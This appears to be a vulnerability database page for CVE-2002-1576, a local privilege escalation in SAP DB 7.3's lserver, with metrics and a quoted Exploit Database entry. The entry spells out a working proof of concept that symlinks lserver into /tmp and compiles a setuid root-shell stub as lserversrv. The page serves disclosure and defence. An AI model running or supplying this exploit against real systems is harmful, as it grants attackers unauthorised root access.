CVE-2002-1576 : Detail

CVE-2002-1576

0.12%V3
Local
2004-03-16
04h00 +00:00
2017-07-10
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

lserver in SAP DB 7.3 and earlier uses the current working directory to find and execute the lserversrv program, which allows local users to gain privileges with a malicious lserversrv that is called from a directory that has a symlink to the lserver program.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 22067

Publication date : 2002-12-03
23h00 +00:00
Author : SAP Security
EDB Verified : Yes

source: https://www.securityfocus.com/bid/6316/info A vulnerability has been discovered in SAP DB that may allow an unprivileged to execute commands with root privileges. The vulnerability is due to insufficient sanity checks by lserver, when attempting to execute the 'lserversrv' binary in the current directory. An attacker can exploit this vulnerability by creating a symbolic link to the 'lserver' binary in a directory containing a maliciously created 'lserversrv' binary. Executing lserver via the symbolic link will cause the malicious 'lserversrv' progam in the current directory to be executed. cd /tmp mkdir "snosoft+sapdb=root" cd "snosoft+sapdb=root" ln -s /usr/sapdb/depend/pgm/lserver lserver echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > root.c cc -o root root.c cp root lserversrv ./lserver

Products Mentioned

Configuraton 0

Sap>>Sap_db >> Version 7.3.00

    References

    http://www.securityfocus.com/bid/6316
    Tags : vdb-entry, x_refsource_BID
    http://www.sapdb.org/sap_db_alert.htm
    Tags : x_refsource_CONFIRM
    http://marc.info/?l=bugtraq&m=103903565829796&w=2
    Tags : mailing-list, x_refsource_BUGTRAQ